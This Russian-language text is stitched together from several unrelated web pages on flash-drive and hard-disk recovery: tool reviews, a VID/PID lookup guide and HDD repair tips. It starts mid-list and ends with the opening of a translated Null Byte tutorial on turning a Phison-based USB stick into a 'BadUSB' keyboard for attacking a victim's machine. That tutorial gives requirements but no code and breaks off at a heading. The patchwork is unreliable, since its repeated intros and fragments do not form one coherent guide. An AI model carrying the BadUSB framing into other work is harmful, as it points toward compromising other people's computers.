    • в разделе «Продолжительность» укажите «Бесконечно» ;
    • нажмите кнопку «Пуск» .
  3. Начнется проверка, ход которой будет отображаться в правой части окна. При тестировании секторов, каждый из них будет выделяться цветом, указанным в Легенде. Если все в порядке, то клеточка светится синим цветом. При наличии ошибок, блок будет помечен желтым или красным цветом. Во вкладке «Легенда» есть подробное описание.
  4. По окончанию работы все ошибки будут указаны на закладке «Журнал» .
  5. В отличие от встроенной команды CHKDSK, которую мы рассмотрим ниже, эта программа при выполнении проверки флеш-устройства, стирает все данные. Поэтому перед проверкой всю важную информацию нужно скопировать в безопасное место.

    Если и после проверки флешка продолжает работать с ошибками, то это говорит о том, что устройство теряет свою работоспособность. Тогда нужно попробовать ее отформатировать. Форматирование может быть обычным или же, если это не помогает, низкоуровневым.

    Выполнить данную задачу Вам помогут наши уроки.

    Также Вы можете использовать стандартное форматирование ОС Windows. Соответствующую инструкцию можно найти в нашей статье по поводу того, как записать музыку на флешку для автомагнитолы (способ 1).

    Способ 2: Утилита CHKDSK

    Эта утилита поставляется в составе Windows и служит для проверки диска на содержание неисправностей в файловой системе. Чтобы воспользоваться ею для проверки работоспособности носителя, сделайте вот что:


У вас есть неработоспособная USB флешка или прочий носитель и вы задумались какую же программу выбрать для восстановления?

Нами были рассмотрены самые популярные утилиты. Какая из приведенных выше программ подойдёт вам и выполнит востановление флешки со 100% гарантией?

Вытащить все данные поможет единственная в своем роде программа Hetman Partition Recovery. Она любима как новичками, так и профи за удобство, скорость работы и продвинутый алгоритм восстановления информации. Ваши файлы будут найдены и скопированы даже когда к ФС носителя уже нет доступа или она повреждена.

JetFlash Recovery Tool — то фирменная утилита, которая обладает максимально простым интерфейсом и поддержкой работы с накопителями Transcend, JetFlash и A-DATA. Управление всего двумя кнопками, явно придется вам по душе. Не стоит забывать, что очищенные данные, восстановить уже не получится, поэтому предварительное сохранение информации с флешки, не станет лишним.

Если же у вас возникла необходимость постоянно иметь при себе универсальную программу, которую удобно применять как на домашнем компьютере, так и вне его пределов, советуем D-Soft Flash Doctor, её платформа не предполагает предварительной установки, запуск производится мгновенно на любом ПК. Программное обеспечение подходит для ремонта, разблокировки,
восстановления объема флешки и ее работоспособности.

При необходимости восстановления SD-карт, советуем загрузить F-Recovery SD, обладающую эффективным набором простых опций для работы с поврежденными флешками от цифровых фотоаппаратов и прочих портативных устройств. С точки зрения профессионального подхода к Flash-накопителям, будет интересно использование Flash Memory Toolkit, приложение содержит целый комплекс дополнительного функционала, способного тестировать флешки, кроме того, программа работает с любыми версиями ОС от Microsoft.

Распознавать максимальное количество различных типов флешек Flash Drive, среди вышеприведенных утилит, а также быстро реанимировать работоспособность накопителей, может утилита форматирования и восстановления USB Disk Storage Format Tool, обладающая очень понятным и удобным интерфейсом. Программа ремонта флешки USB Disk Storage сумеет быстро восстановить данные поврежденных разделов жесткого диска даже если обнаружены проблемы прошивки флешки.

Если ни одна программа восстановления флешки не помогла, рекомендуем проверить состояние контроллера памяти при помощи утилиты ChipGenius. Прога работает с USB, микро сд, SD, SDHC и ЮСБ-Мпз плеерами производителей Kingston, Silicon Power, Transcend, Adata, PQI. Дальнейшие действия по исправлению ошибок, восстановлению потерянных данных целесообразны только ксли
флешка определяется в Chip Genius.

Пошаговая инструкция по восстановлению USB флешек в которой я постараюсь доступным языком ответить на вопрос Как восстановить флешку самостоятельно и без особых усилий.

Вот бывает поможешь человеку, а он потом всем растрындит, что ты такой хороший и идут уже толпы жаждущих за помощью. Примерно так все и получилось, когда я восстановил несколько флешек коллегам.

Теперь народ несет не только свои флешки , но и флешки своих друзей, знакомых и родственников. Ну вот хоть бы кто-то еще бутылочку пива приволок или печеньку – фигушки.

Мне-то не сложно помочь, но когда я предлагаю вам самим научиться все это делать, вы отнекиваетесь. Таких я в следующий раз просто отшиваю. Не хочешь учиться – проходи мимо.

С лирикой на этом заканчиваю и перехожу непосредственно к теме поста..

Если ваша флешка перестала определяться как диск, не хочет форматироваться , не дает записать информацию или еще что-то там с ней случилось, НО она не имеет механических повреждений, то знайте – еще не все потеряно. Скорее всего глюкнул контроллер и с ним придется немного повозиться. По времени эта процедура занимает, примерно, 5 минут.

Сразу скажу, что не существует универсальной программы для восстановления всех разновидностей флешек . Необходимо будет найти именно ту, которая сможет работать с контроллером вашей флешки .

Для начала нам необходимо определить VID и PID нерабочей флешки .

Определить VID и PID для восстановления флешки

Воткните флешку в компьютер и запустите Диспетчер устройств . Пуск Выполнить mmc devmgmt.msc .


Затем зайдите в раздел Контроллеры универсальной последовательной шины USB .


Находим в списке свою флешку . Обычно, все флешки имеют название Запоминающее устройство для USB .


Жмем на устройстве правую клавишу и открываем Свойства .

Переходим на вкладку Сведения .

В выпадающем списке выбираем пункт Код экземпляра устройства или Коды (ID) оборудования .

В этом окне мы видим PID и VID .

Поиск программы для восстановления флешки

Заходим на сайт FlashBoot.ru и вводим на нем полученные VID и PID .


Жмем на кнопку Search .

В результатах ищем своего производителя и модель флешки. У меня это Kingston DataTraveler 2.0.


В правой колонке будет название нужной нам программы или ссылка на нее.

Все. Теперь ищите в Google программу по названию или качаете по указанной ссылке. Запускаете и следуете инструкциям. Обычно, в подобных программах для восстановления всего одна кнопка, поэтому вопросов у вас возникнуть не должно.

На этом всё!

Возникнут вопросы — задавайте в комментариях.

Выбираем лучшие программы для восстановления флешек. Рассказываем, как восстановить usb флешку, реанимировать ее с помощью бесплатных утилит.

Флеш-накопитель – небольшое устройство для хранения информации (документы, музыка, видео, файлы), удобное для переноски и подключения в usb-порт, извлечения из компьютера, ноутбука. Содержит в себе контроллер и специальные чипы, хранящие информацию внутри микросхем.

Порой мы копируем файлы и забываем о них, а когда вспоминаем, то обнаруживаем, что ценные файлы либо стерты, либо удалены безвозвратно. Либо устройство сломалось, вы отформатировали разделы. Что поделать, часто цифровой flash-накопитель (чаще всего, контроллер в ней) ломается, генерирует ошибки, не открывается на ПК флешка — не пройдет и месяца. Однажды флешке может потребоваться восстановление. Причиной того, что , может быть:

  • неправильная, неаккуратная эксплуатация flash-накопителя
  • некорректное форматирование носителя информации
  • некачественная флешка, купленная на рынке или задешево у китайца (вероятно, по ошибке)
  • физическая или программная поломка флешки (наиболее вероятная причина)
  • также поводом для неработоспособности может служить некорректно извлеченная флешка из компьютера или ноутбука. Это случается, когда нетерпеливый пользователь буквально вырывает flash-накопитель из usb-гнезда в процессе копирования или переноса файлов.

Причин, когда необходимо восстановить флеш-накопитель, который не открывается на компьютере или распознается с ошибками чтения, — множество. К счастью, на сегодняшний день специалисты из сервисных центров без проблем и ошибок помогут вам вернуть ценные файлы, восстановить работоспособность устройства. Программы для восстановления вернут файлы в целости и сохранности или хотя бы частично реанимируют данные на usb флеш-накопителе. Стоит процедура flash recovery это не таких уж малых денег, что заставляет задуматься о самостоятельном восстановлении usb флешки. Увы, бесплатные утилиты далеко не всегда полезны.

Для flash-накопителя, sd карт памяти в той же степени характерны все симптомы и последствия удаления цифровой информации. Это может быть случайное стирание, неосознанное или предумышленное удаление файлов с usb-накопителя, повреждение структуры, физические или механические повреждения контроллера или чипов памяти… Так или иначе, но восстановление флешки и sd карты – задача более чем актуальная для владельцев ПК. Поэтому первым делом ознакомьтесь с содержанием этого раздела.

Не открывается флешка: изучаем симптомы повреждения

В разделе по восстановлению мы поговорим об основных проблемах, связанных с восстановлением информации на flash- и secure digital накопителе. Как правило, это связано с аппаратным или программным повреждением флешки — если она не отрывается или не распознается корректно. Иногда изнашивается память, иногда выходит из строя контроллер. И драйверы usb-контроллера здесь не при чем. В некоторых случаях можно решить проблему самостоятельно и в результате сохранить файлы на флеш карте или починить chip, устройство, игнорируя ошибки считывания на компьютере. Перечислим только некоторые симптомы, свидетельствующие о поломке накопителя:

  • ПК не видит флешку в списке доступных для чтения устройств
  • не отображается флешка при подключении к ноутбуку или компьютеру (ОС не имеет значения)
  • не читается флешка: хотя файлы можно видеть на usb-накопителе

Помощь по содержимому раздела «Восстановление флеш-накопителя» (Flash Recovery)

  • Небольшое руководство, относящееся к вопросу, как — поиск причин, почему карточка не работает или ПК не видит флешку наравне с другими дисками (не распознается устройство, читается с проблемами, требует форматирования, зависает, выдает ошибку при копировании на карточку и проч.) флеш-накопитель. Диагностика неисправностей важна в подобных ситуациях, поскольку, не определив болезнь, нельзя излечить пациента, а то и легко загубить ему жизнь, орудуя не теми инструментами, используя не те методы и программы, которые способны оживить накопитель. В этой статье мы анализируем причины повреждения и возможные симптомы, которые приводят к необходимости восстановления flash-диска, secure digital, контроллера,memory chip»а и флеш-карты.
  • Пробуем (при помощи инструкций и утилит, выложенных на сайте) и при этом качественно — как своими руками решить проблемы — устранить поломку на карте sd, реанимировать контроллер, правильно отформатировать, припаять отошедший контакт или чип памяти, отсканировать информацию и обработать битые секторы на flash»ке, разделы с ошибками чтения. Правда, описанные методы требуют известной сноровки и опыта владения указанными инструментами.
  • , если она не открывается на компьютере или не отображается корректно. Что такое «VID&PID», как расшифровывается эта аббревиатура и что делать, когда не распознается или не открывается устройство. Пояснение терминологии, без которой сложно себе представить восстановление для флешки , данных и цифровой информации на ней.
  • — тестирование 5 добротных программ, у каждой из которых есть примечательные особенности при работе с памятью или чипом накопителя.

Восстановление usb-флешки и карты памяти. Утилиты для форматирования

Один из наилучших способов реанимации флеш-карты Jetflash – переформатировать его заново, на низком уровне. Как правило, подобные меры предпринимаются, когда flash-накопитель не читается. По возможности, нужно спрашивать производителя памяти (скажем, A Data, Seagate, Transcend SD, Datatraveler или др.), есть ли у них фирменные утилиты или свежие драйверы для реконструкции. Пролистайте содержание этого раздела для помощи, и вы увидите несколько статей по теме низкоуровневого форматирования накопителя. К счастью, в операционной системе Windows 7 и выше имеются средства для форматирования flash-устройства без использования сторонних приложений компьютера. Одна из таких программ для флешки – HP USB Disk Storege Format Tool.

Диагностическое форматирование флеш карты в программе для восстановления флешек HP USB Disk Storege Format

Утилита для восстановления флешки HDD Low Level Format Tool

Многие знают, что программа HDD Regenerator используется для помощи при оживлении жестких дисков (HDD), однако не многие знают, что она подходит и такого устройства, как флэшка. Суть программы – обнаружение битых bad-секторов на устройстве с последующей обработкой полученной информации, в зависимости от контроллера и модели памяти, на низком уровне доступа по usb. В результате вы получаете рабочее устройство, которое сможет копировать файлы без ошибок чтения и записи. Это в значительной мере способствует восстановлению флешек, если компьютер их не видит. Программа HDD Regenerator снабжена инструкцией по восстановлению, к тому же, на сайте сайт recovery вы можете найти руководство по использованию утилиты и корректному форматированию (см. через поиск). Cкачать программу для восстановления флешки можно непосредственно по ссылке, размещенной на странице обзора HDD Regenerator»а.


Открываем и диагностируем проблемную флешку в программе HDD Low Level Format

К слову, в других разделах на сайте Softdroid вы найдете и другие программы для восстановления флешек (например, Flash Recovery или JetFlash Recovery Tool), но советуем вначале изучить всю информацию, собранную в этом разделе. Надеемся, после предпринятых мер комп увидит вауш флешку.

Почему вы не указываете о стоимости продукта, перед тем как скачать программу для восстановления флешки и установить ее?

Ответ . Скачать все упомянутые программы для восстановления флешки вы можете на официальном сайте. На Softdroid опубликованы только обзоры – у нас нет физической возможности обновлять информацию о стоимости представленных продуктов. Когда вы скачиваете ознакомительную версию программы, она бесплатна. Далее смотрите информацию о стоимости у разработчика либо по окончанию trial-срока у вас появится уведомление.

Задайте нам вопрос по восстановлению флешки

Специалисты сайта сайт помогут восстановить данные. Вы задаете вопрос — мы бесплатно отвечаем на него (ответ вы получите по почте).

Вопрос может быть не связан с восстановлением файлов. Главное требование — детально опишите проблему, сформулируйте ее так, чтобы не пришлось расшифровывать ваше послание.

Flash Drive Information Extractor – программа для получения информации и диагностики usb флешки

Информация о флешке (модель, производитель, версия прошивки) помогает лучше понять устройство, особенности его работы. В свою очередь, это позволяет, продиагностировать, восстановить файлы или исправить работу устройства.

Как восстановить удаленные файлы с usb-флешки: пошаговое руководство

Одна из наболевших проблем, связанных с удалением файлов, относится к флеш-накопителю. Поговорим о том, как восстановить удаленные файлы с флешки в программе Unformat. Какой бесплатный софт установить на компьютер, какая программа, помимо Unformat, эффективна при работе с флешкой. Нижеописанные методы будут актуальны для usb накопителей, карт памяти, sd карточек цифровых фотокамер в среде ОС Windows. Постараемся вам помочь, даже если ситуация сложная.

Что делать, если компьютер не видит usb-флешку? Решаем проблемы и устраняем ошибки

Если файловая система карты памяти / usb флешки несовместима с ОС компьютера, при подключении к ПК содержимое этой карты памяти не отобразится. Соответственно, работать с устройством вы не сможете, пока не исправите формат. Кроме того, есть ряд других причин, из-за которых компьютер не отображает usb флешку (sd карту) как отдельный диск в Проводнике.

Как восстановить флешку своими руками: инструкция для владельцев flash-накопителей

В данной статье я хочу рассказать, как восстановить флешку: о всех доступных методах восстановления поврежденных, нерабочих, сбойных, неисправных usb-накопителей. Я предлагаю наиболее полную инструкцию, которая включает в себя все доступные способы, а также программы, которые оптимизируют восстановление флешки .

Ремонт usb-флешки своими руками: устраняем аппаратные и программные неполадки

Что делать, если компьютер не видит флешку? Согласимся: вопрос болезненный и часто задаваемый. Еще один из популярных вопросов, с которым сталкиваются обладатели флешки — ремонт в результате поломки. USB-накопитель имеет свои особенности починки контроллера, памяти, вышедших из строя: в ряде случаев устройство хранения не определяется ПК. Что делать, если флешка не определяется ни на одном компьютере? Это руководство описывает операцию по реанимации «невидимой» флешки для корректного распознавания на компьютере.

Обзор программ для восстановления работоспособности usb флешки

Ошибки в работе USB флешек встречаются не часто. Почти все они сводятся к невозможности считать или записать необходимую информацию в память устройства из-за программного повреждения.

Устранить проблему и восстановить карту памяти помогут специализированные программы, предоставляемые производителями устройств.

Для восстановления работы noname флешек и тех, у которых нет собственного ПО для восстановления, подойдёт встроенный в Windows Chkdsk и система форматирования.

Выбираем лучшую программу для восстановления удаленных файлов с usb-флешки

Повредили переносную usb-флешку или карту памяти? Эти лучшие в своем роде программы помогут сохранить и вернуть информацию, и здесь вы узнаете, в чем заключается восстановление данных с флешки. Среди приложений — Undelete 360, CardRecovery, PhotoRec, Recuva Professional и другие кандидаты. Также вы узнаете, как реанимировать флешку каждой из программ.

EaseUS Data Recovery Wizard Free 11 – программа для бесплатного восстановления данных

EaseUS Data Recovery Wizard поддерживает множество сценариев удаления данных на SSD. Мы запустим Recovery Wizard и в пошаговой форме поясним, как выполняется восстановление. В бесплатной версии Easeus Data Recovery Wizard Free есть ограничения, расскажем о них подробнее. С помощью программы EaseUS Data Recovery Wizard вы сможете бесплатно восстановить файлы, удаленную информацию с отформатированного диска, ноутбука или съемных устройств вроде флешки или sd-карты.

Где скачать программу PhotoRec бесплатно (для ОС Windows)

Бесплатная программа PhotoRec предназначена для восстановления мультимедиа данных на HDD, USB-флешках, sd-картах и других устройствах хранения. Обзор функций восстановления PhotoRec, опций сканирования. Где скачать PhotoRec для Windows и других ОС.

Ремонт жесткого диска своими руками: пошаговая инструкция и видео


Жесткий диск – самый хрупкий элемент компьютера. Именно он отвечает за хранение всей информации и понятно, почему его повреждение приводит к панике. Вопросом, как починить жесткий диск рано или поздно задается любой человек. Исключение: очень предусмотрительные люди, постоянно наблюдающие за состоянием накопителя и регулярно делающие резервные копии всей хранящейся на нем информации. Но так как встречаются такие люди редко, информация о ремонте HDD своими руками весьма популярна.

Проверка состояния жесткого диска при помощи SMART

В современные жесткие диски встроена система самодиагностики SMART. Она помогает определить неполадки, спрогнозировать поломку жесткого диска – таким образом, своевременно предотвратить потерю данных. Через SMART можно узнать процент износа HDD, а также проверить текущие параметры, производительность устройства.

Для того, чтобы проверить состояние жесткого диска,

  1. Установите программу для проверки SMART (например, Hitachi Drive Fitness Test, CrystalDiskInfo или HDD Health, см. полный список).
  2. Запустите программу и подождите, пока считаются характеристики жесткого диска.
  3. Изучите показатели, сверяя текущий и критический показатели. Если обнаружена ошибка, изучите по таблице, что она значит.

Отдельный плюс SMART-диагностики – можно быстро и достаточно точно определить состояние жесткого диска, как только что купленного, так и б/у. Однако учтите, что SMART может ошибаться, даже если по статистике все ОК.

Если ошибки носят фатальный характер, сделайте резервную копию важных данных и замените HDD. Расставаться с деньгами – процедура неприятная, но лучше сделать это вовремя, а не после краха жесткого диска со всеми вытекающими.

Видео по ремонту жёстких дисков своими руками

В интернете достаточно много видеороликов, в которых наглядно демонстрируется несколько способов устранения неисправностей винчестера. В основном они связаны с разбором корпуса жёсткого диска и чисткой элементов платы. Это объясняется тем, что почти 90% случаев поломок винчестера происходят по причине окисления электрических контактов.

Определить места, требующие устранения окиси и грязи несложно. Такие дорожки контактов выглядят потемневшими. Для начала аккуратно пройдитесь ластиком до появления светлого блеска. Обязательно очищаем группу контактов, идущих на привод (как правило, их 3). Далее берём спирт и старую зубную щётку – с их помощью дополнительно промываем дорожки контактов.

Теперь нужно защитить элементы платы от дальнейшего окисления. В принципе можно покрыть даже силиконовой смазкой. Она не пропускает ток, но защищает от коррозии. Однако лучше всего обработать контакты специальными аэрозольными средствами. Например, Kontakt 60. При офисном либо домашнем использовании ноутбука рекомендуем производить подобную чистку плат жёсткого диска не менее 1 раза в год.

Если описанные советы и способы ремонта жёсткого диска своими руками не помогли устранить проблему, то лучшим вариантом станет обратиться в специализированный центр. Главное, не увлекаться самоустранением неполадок и ни в коем случае не слушать рекомендации на разных форумах о том, что поможет нагрев винчестера или его пребывание в микроволновой печи. Это лишь навредит устройству и отнимет ваше время.

Исправление ошибок чтения на жестком диске

При наличии ошибок на жестком диске, его работа ухудшается. Характерные симптомы:

  1. Жесткий диск издает странные звуки (например, громкое шуршание головок, скрипы, щелчки)
  2. Существенно снижается производительность операционной системы
  3. «Тормоза» и «подвисания» при открытии файлов на жестком диске
  4. Внезапно пропадают файлы, папки, разделы HDD отображаются как неразмеченное пространство (RAW).

Самые простые ошибки чтения исправляются системной утилитой chkdsk.

Некоторые bad-блоки можно “вылечить” самостоятельно, в этом помогут две замечательные программы – HDD Regenerator и Victoria HDD.

В дополнение к этому – инструкция по восстановлению bad-блоков: здесь объясняется, как исправить ошибки программой HDD Regenerator. Фактически, она не исправляет bad-блоки, а переносит их в другую область на жестком диске. Таким образом, другие процессы и программы будут обходить эти блоки стороной.

Ситуация усложняется, если повреждена таблица файлов, таблица разделов или иная служебная информация. В таких случаях необходимо клонировать содержимое HDD на “донор” – исправный жесткий диск аналогичной модели. Сделать это можно только в спец. лабораториях.

ПЕРЕД НАЧАЛОМ РАБОТ СОХРАНИТЕ ВСЕ ДАННЫЕ. СДЕЛАЙТЕ РЕЗЕРВНУЮ КОПИЮ.

Приведём список известных производителей винчестеров на российском рынке, продукция которых может находиться во чреве вашей машины. Напротив названия фирмы можете скачать и указанные утилиты прямо с нашего сайта. Захочется обратиться к первоисточнику – пройдите по соответствующей ссылке.

Для начала протестируйте свой диск с помощью SMART на наличие повреждений. Помните, что каждая из программ при неправильном с ней обращении способна привести вашему винчестеру непоправимый вред. Читайте инструкции и файлы справки!

HDD не определяется (это не значит, что он сломан)

Если компьютер не “видит” жесткий диск (подключенный через Sata или IDE- интерфейсы), это не обязательно связано с поломкой диска.

Сперва убедитесь, что HDD подключен к ПК правильно. Как это сделать:

  1. Выключите ПК и обесточьте блок питания (на нем есть соответствующая кнопка).
  2. Аккуратно извлеките жесткий диск из системного блока, отключив от материнской платы и блока питания.
  3. Очистите винчестер от пыли.
  4. Поставьте HDD на прежнее место, проверив шлейфы SATA/IDE и кабель питания (идущие, соответственно, от материнской платы и блока питания к жесткому диску): нет ли повреждений, плотно ли HDD входит в гнездо устройства.
  5. Включите ПК.
  6. Зайдите в BIOS и проверьте, есть ли HDD в списке загрузочных устройств.

Съемный HDD

В целом процедура восстановления работоспособности внешних жестких дисков ничем не отличается от обычных стационарных HDD.

Но здесь присутствуют несколько дополнительных моментов:

  1. Если возникла какая-либо проблема с выносным HDD, то первое, что необходимо сделать, это поменять кабель подключения «USB».
  2. Бывает, что после активного использования расшатывается гнездо подключения в боксе винчестера. Нет необходимости менять весь бокс, достаточно приобрести и заменить SATA-USB адаптер, находящийся внутри коробки. Стоят такие адаптеры недорого.

  3. Проблема с драйверами в Windows. Не стоит исключать возможность некорректной работы USB драйверов. Поэтому обязательно обновите драйвера, и перезагрузите компьютер.

Выполнение этих действий должно вернуть устройство в строй.

Подозрительно щелкает жесткий диск: что делать

Если при старте ОС жесткий диск издает щелчки, причиной, как правило, является износ головок жесткого диска. Как и любую другую механическую поломку HDD, собственными руками исправить ее нельзя.

Однако если вы слышите щелчки на еще работающем жестком диске (то есть, он нормально считывает и записывает файлы), нужно срочно предпринять меры и перестраховаться.

Первым делом, обязательно выполните резервное копирование ценной информации на другой HDD, usb-флешку или в облачное хранилище.

Как только резервная копия сделана, изучите SMART-показатели с помощью приложений, о которых мы писали выше. Самодиагностика позволит определить актуальное состояние жесткого диска и выявить ошибки.

Диагностика и причины

При определении проблем с винчестером в первую очередь следует прислушаться к работе компьютера, затем визуально рассмотреть внешнюю и внутреннюю стороны диска. Основной причиной поломок жёстких дисков в первый год «жизни» является производственный брак. И только по истечении 3 лет службы можно говорить об износе механических частей.

  • Если жёсткий носитель издаёт неприятный звук, это свидетельствует о наличии серьёзной поломки. Причин такой проблемы может быть много: попадание пыли и инородных тел, неисправность привода, удар, заклинивание шпинделя, плохая фрагментация, большой срок эксплуатации и т. д.
  • Также, если BIOS не определяет HDD, проблема может быть как очень серьёзной, так и беспричинной. То есть, система может не видеть винчестер потому, что на нём не созданы разделы. Здесь ремонт жёсткого диска заключается в необходимости (в случае с Windows) в «Панели управления» выбрать «Администрирование», «Управление компьютером», «Управление дисками», инициализировать диск и создать разделы.

  • Накопитель может быть абсолютно исправным в следующих случаях: неправильное подключение, неверное установление перемычек на нём, повреждён шлейф соединения диска с контроллером материнской платы.

Сломан / поврежден контроллер

Характерные симптомы при данном типе поломке:

  • стучание внутри корпуса HDD
  • жесткий диск не отображается в BIOS.

Для устранения поломки потребуется полная замена контроллера и, в некоторых случаях, перепрошивка / замена электроники жесткого диска. В остальном, данные на устройстве могут быть считаны как ни в чем ни бывало. Однако восстановить жесткий диск самостоятельно не представляется возможным.

Если информация на диске представляет особую ценность, ремонт HDD в специализированной лаборатории выльется в несколько сотен долларов.

Поврежденные (бэд) сектора

Бэды – недоступные для чтения или записи сектора, при попытке доступа к которым, накопитель начинает тормозить или вовсе выдавать ошибки. Особенно если в эти самые сектора ранее была записана какая-либо информация.

Они бывают двух видов:

  1. Софт бэды (логические) – программные ошибки, возникшие в результате сбоя устройства. Например, после резкого выключения света, перепада напряжения в сети или статики. Они вполне излечимы.
  2. Физические – возникают в результате естественного износа «электронного друга» или механических повреждений. Например, после встряски, падений или ударов. В этих случаях восстановление жесткого диска проводиться исключительно профессионалами со специальным оборудованием и в специальных чистых условиях.

Заранее предугадать с какими типами недоступных секторов вы столкнулись нельзя. Необходимо проводить предварительную диагностику с помощью программ для ремонта жестких дисков. Наиболее эффективными из которых являются «Victoria», «MHDD» или «HDAT». Они просты в использовании, но к сожалению не распространяются на русском языке.

Также эти утилиты способны выявить «намечающиеся» бэды и устранить их.

Дополнительно могу порекомендовать обзавестись универсальным загрузочным диском с необходимым набором утилит для ремонта не только HDD, но и всего компьютера. Наиболее популярными сборниками являются «RBCD», «AdminPE10», «Ultimate Boot CD» и «BootHDD».

Восстановление HDD в случае падения (повреждения корпуса)

Как и при любой поломке HDD, характерны симптомы:

  • диск начинает издавать стуки и щелчки
  • не определяется через BIOS
  • может внезапно останавливаться, безуспешно “заводиться”.

Для устранения поломки и восстановления диска потребуется полная разборка сбойного блока и замена его механической начинки, куда входят головки, цилиндры, диски и другие элементы.

В данной ситуации самым реалистичным решением является замена жесткого диска на новый.

Прошивка

Проблема с микропрограммой жесткого диска могут привести к тому, что тот не с может пройти инициализацию во время запуска, например, при сбое записи служебной информации либо битых секторах, где та записана.

Такое может случиться, но редко, и после сброса S.M.A.R.T. данных.

В этой ситуации поможет обновление микропрограммы на новую, скачанную с официального сайта производителя накопителя, разработанную для вашей модели винчестера.

Все сложные варианты ремонта с запылением головок (чаще происходит во внешних HDD и на ноутбуках вследствие их падения), заклиниванием подшипников и неполадки с двигателем, выхода из строя головок или их пакетов, сгоранием элементов, лущением дорожек и прочие неполадки устраняются только при наличии специализированных технических средств.

Как можно продлить жизнь жесткого диска

Неправильная эксплуатация жесткого диска приводит к скорейшему выходу устройства из строя.

Профилактика жесткого диска включает в себя:

  • проверку на наличие сбойных секторов, bad-блоков,
  • дефрагментацию (см. обзор программ),
  • проверку SMART показателей,
  • мониторинг температуры.

Как и любое механическое устройство, жесткий диск требует бережного отношения: удар в результате падения может стать фатальным.

Неисправная поверхность диска

Поверхность диска (блок магнитных пластин) очень уязвима, так как постоянно находится в контакте с двигающейся головкой. Из-за неисправной головки или механических ударов по корпусу ноутбука, на поверхности диска могут образовываться царапины и вмятины, которые приводят к неприятному звуку при работе, а также потери информации с диска. Зачастую стоит заменить головку диска, чтобы с поверхностью больше не было проблем.

Попробуйте восстановить диск самостоятельно

Если файлы и документы не жизненно важные, можно попытаться починить диск своими руками. Шансы на успех в этом случае не так велики, но есть.

Предварительно необходимо восстановить информацию, которая хранится на накопителе. Для этого есть много бесплатных и платных утилит.

Все они работают по схожему принципу. Нужно выбрать диск, просканировать его, а затем указать, какие из найденных файлов необходимо восстановить. Накопитель придётся подключить USB-кабелем или установить в другой компьютер, на котором и запускать ПО для восстановления.

Затем можно приступать к реанимированию самого диска.

Способ 1: очистить контакты

Как и любые другие электрические контакты, соединение платы контроллера с жёстким диском со временем окисляется. Это приводит к некорректной работе и ошибкам. Для устранения проблемы контакты необходимо почистить канцелярским ластиком или чистым этиловым спиртом.

  1. Отверните все винты по периметру платы и аккуратно извлеките её со своего места.
  2. Тщательно почистите позолоченные контакты ластиком.
  3. Протрите смоченной в спирте ватной палочкой. Водку и другие спиртосодержащие жидкости при этом использовать не рекомендуется.
  4. После чистки соберите всё в обратном порядке, подключите диск и проверьте его работоспособность.

Способ 2: удалить битые секторы

Если предварительные проверки показали наличие Bad-блоков на диске, можно попытаться удалить их с помощью утилиты Victoria.

  1. Подключите проблемный диск к другому компьютеру.
  2. Скачайте и запустите программу Victoria.
  3. Выберите в правой части вкладки Standard нужный диск.
  4. Перейдите на вкладку Tests и выберите параметр Remap в правой части окна.
  5. Нажмите кнопку Start и дождитесь окончания процесса.

Ремонтируем головку диска

Как починить жесткий диск ноутбука, если сломалась его головка? Для начала вам нужно подготовиться к ремонту и раздобыть донора для своего компонента. Донором является новый накопитель, который можно будет установить на место предыдущего “жителя”.

Важно! Новый подобранный компонент обязательно должен подходить к модели вашего винчестера и быть работающим!

Сперва необходимо понять, как демонтировать сам HDD из корпуса лэптопа. Для того чтобы снять компонент, необходимо выполнить следующее:

  • Сперва потребуется раскрутить все винты на поверхности детали. К сожалению, такие крепящие элементы имеются далеко не на всех моделях устройств.
  • Далее нужно будет снять с HDD крышку. Выполняйте эти действия с особой осторожностью, поскольку рискуете повредить дисковую прокладку.
  • Потом необходимо снять магнит и открутить винты. Вы должны будете увидеть перед собой VCM-катушку. Сразу за последним компонентом располагаются головки, которые вам и потребуется снять.
  • Легкими движениями придется покрутить компоненты в стороны, для того чтобы они не прилипли к магниту.

Важно! Лучше всего использовать какой-нибудь материал в виде кусочка ткани или бумаги, чтобы вставить его в пространство между головками.

  • Далее нужно снять сами головки и установить на их место новые детали. Лучше всего проводить такие действия при помощи пинцета и обязательно использовать резиновые перчатки.
  • Потом нужно будет установить на свое место магнит, закрыть все это дело крышкой и зафиксировать болтами. Остается расположить винчестер внутри ноутбука, и можно браться за проверку выполненной работы.

Если все действия были выполнены правильно и после перезагрузки появились данные о новом устройстве, то вы справились.

Как сделать свой собственный плохой USB «Null Byte :: WonderHowTo

Всем привет!

Многие из вас даже не знают о моем существовании здесь, на Null Byte, поэтому я подумал о том, чтобы внести что-нибудь довольно интересное. Недавно кто-то спросил, как сделать свой «Плохой USB», и я пообещал сделать по этой теме инструкции. Кроме того, было бы неплохо иметь что-нибудь связанное с нашим миром WonderHowTo. Итак, вот оно!

Введение

Большинство распространенных USB-накопителей можно использовать из-за уязвимости «BadUSB».Это позволяет нам, хакерам, перепрограммировать микроконтроллер в них, чтобы он действовал как устройство интерфейса пользователя (HID), например, клавиатура, и выполнять пользовательские нажатия клавиш на нашей целевой машине. Этот сценарий часто называют «атакой HID Payload Attack», поскольку вам необходимо передать свой сценарий на Bad USB для выполнения (подробнее об этом позже). Несмотря на то, что почти все USB-накопители можно эксплуатировать, единственный выпущенный метод перепрограммирования предназначен для микроконтроллеров Phison.

В этом руководстве мы собираемся определить микроконтроллер вашего USB-накопителя, скомпилировать исходный код, опубликованный в GitHub, для необходимых нам инструментов, и перейти к созданию пользовательской прошивки со встроенной полезной нагрузкой HID, которая сделает нашу безвредную USB-накопитель во вредоносную клавиатуру, призванную помочь нам взломать нашу машину жертвы.Этот процесс похож на компиляцию и прошивку ПЗУ на ваше устройство Android.

Требования

  • Нам нужно работать в Windows.
  • Также нам понадобится флешка USB 3.0 с микроконтроллером Phison 2303 (2251-03). Вы можете найти список известных поддерживаемых устройств на GitHub. В этом руководстве я буду использовать накопитель Toshiba TransMemory-MX USB 3.0 емкостью 8 ГБ.

Иногда наличие подтвержденного устройства не означает, что PS2251-03 действительно используется, поскольку производители, похоже, используют разные контроллеры даже в пределах одних и тех же моделей устройств.

  • Убедитесь, что вы можете открыть корпус USB-устройства, не повредив его. Одному из моих друзей пришлось буквально распилить свое USB-устройство, потому что он поторопился. Пожалуйста, прочтите раздел «Установка нашего устройства в« режим загрузки »вручную» в конце этой статьи, чтобы узнать, как его открыть.

Продолжайте на свой страх и риск; Нет гарантии, что ваше устройство будет работать, даже если никаких проблем быть не должно.

Определение микроконтроллера нашего USB-накопителя

